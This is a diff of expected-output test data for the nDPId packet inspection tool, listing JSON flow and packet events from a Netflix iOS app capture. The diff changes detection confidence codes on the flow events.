{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} -01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -245,94 +245,94 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 